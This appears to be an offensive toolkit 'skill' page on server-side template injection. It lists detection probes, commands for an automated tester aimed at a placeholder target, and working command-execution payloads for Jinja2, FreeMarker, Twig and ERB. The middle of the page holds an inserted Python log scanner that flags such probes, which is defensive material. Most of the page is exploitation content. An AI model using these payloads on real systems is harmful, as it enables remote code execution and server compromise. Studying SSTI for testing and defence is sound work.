attack-ssti
Server-Side Template Injection — detection, engine fingerprinting, and exploitation across 7 template engines
| Field | Value |
|---|---|
| name | attack-ssti |
| description | Server-Side Template Injection — detection, engine fingerprinting, and exploitation across 7 template engines |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["ssti","rce","injection","web","attack"] |
| tech_stack | ["web","python","java","ruby","php"] |
| cwe_ids | ["CWE-94","CWE-1336"] |
| chains_with | ["attack-ssrf"] |
| prerequisites | [] |
| severity_boost | {"attack-ssrf":"SSTI → SSRF → internal service access = RCE chain"} |
Detect and exploit server-side template injection to achieve code execution on the server.
```bash
# Automated SSTI detection across 7 engines
attack_script ssti_tester "https://TARGET/search?q=FUZZ" --param q --json-output

# Quick mode (math payloads only)
attack_script ssti_tester "https://TARGET/render" --param template --quick
```
Inject into every user-controlled parameter:

```
{{7*7}} → 49 (Jinja2, Twig)
${7*7} → 49 (FreeMarker, Velocity, EL)
<%= 7*7 %> → 49 (ERB, JSP)
#{7*7} → 49 (Thymeleaf)
{{7*'7'}} → 7777777 (Jinja2 string multiplication)

{{config.items()}} → Jinja2 (Flask/Python)
{{request.application.__globals__}} → Jinja2
${T(java.lang.Runtime)} → Spring EL
<#assign x=1>${x} → FreeMarker
{{_self.env.getFilter('id')}} → Twig (PHP)
<%= system('id') %> → ERB (Ruby)
```
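The probes listed above leave a recognisable trace in request logs. As an added example (not part of this skill or its `ssti_tester` script), the following Python code flags those delimiter and arithmetic probes in access-log lines, including double-encoded ones, and reports clients that try several engine families. The log format, the sample lines and all function names are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Delimiter families from the probe list above; engine labels are the page's own.
FAMILIES = {
    "{{ }} Jinja2/Twig": re.compile(r"\{\{(.+?)\}\}"),
    "${ } FreeMarker/Velocity/EL": re.compile(r"\$\{(.+?)\}"),
    "<%= %> ERB/JSP": re.compile(r"<%=(.+?)%>"),
    "#{ } Thymeleaf": re.compile(r"#\{(.+?)\}"),
}
# Arithmetic canary such as 7*7 or 7*'7' inside the delimiters.
ARITH = re.compile(r"""^\s*\d+\s*[*+-]\s*(\d+|'\d+'|"\d+")\s*$""")
# Assumed log format: common/combined, i.e. IP - - [time] "METHOD target PROTO" ...
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')

def decode(value, rounds=3):
    for _ in range(rounds):  # repeat so double-encoded probes are also seen
        value, prev = unquote_plus(value), value
        if value == prev:
            break
    return value

def classify(target):
    """Return [(family, expression, kind)] for template syntax in a request target."""
    text, hits = decode(target), []
    for family, pattern in FAMILIES.items():
        for m in pattern.finditer(text):
            expr = m.group(1).strip()
            kind = "math-probe" if ARITH.match(expr) else "template-syntax"
            hits.append((family, expr, kind))
    return hits

def sweeping_sources(lines, min_families=2):
    """Map client IP -> families probed, for clients that tried several engines."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG.match(line)
        for family, _expr, _kind in classify(m.group(2)) if m else []:
            seen[m.group(1)].add(family)
    return {ip: sorted(f) for ip, f in seen.items() if len(f) >= min_families}

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [10/Mar/2025:10:00:01 +0000] "GET /search?q=%7B%7B7*7%7D%7D HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Mar/2025:10:00:02 +0000] "GET /search?q=%24%7B7*7%7D HTTP/1.1" 200 498',
    '203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /search?q=%3C%25%3D+7*7+%25%3E HTTP/1.1" 200 498',
    '198.51.100.4 - - [10/Mar/2025:10:01:10 +0000] "GET /search?q=blue+shoes HTTP/1.1" 200 1300',
]
```

A `math-probe` hit is the high-signal case; `template-syntax` hits also occur in legitimate traffic for applications that accept template-like text, so triage those against the endpoint's expected input.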
Jinja2 (Python/Flask):

```
{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
{{''.__class__.__mro__[1].__subclasses__()[XXX]('id',shell=True,stdout=-1).communicate()}}
```

FreeMarker (Java):

```
${"freemarker.template.utility.Execute"?new()("id")}
```

Twig (PHP):

```
{{_self.env.registerUndefinedFilterCallback('system')}}{{_self.env.getFilter('id')}}
```

ERB (Ruby):

```
<%= `id` %>
<%= system('id') %>
```
```bash
# Test POST parameters
attack_script ssti_tester "https://TARGET/api/render" --param content --method POST --data '{"content":"FUZZ"}'
```
| Finding | Severity |
|---|---|
| Math expression evaluated (7*7=49) | High (P2) |
| Config/env data leaked | High (P2) |
| Command execution achieved | Critical (P1) |
| File read via template | Critical (P1) |
- attack_script ssti_tester — automated multi-engine detection
- tplmap (external) — SSTI exploitation framework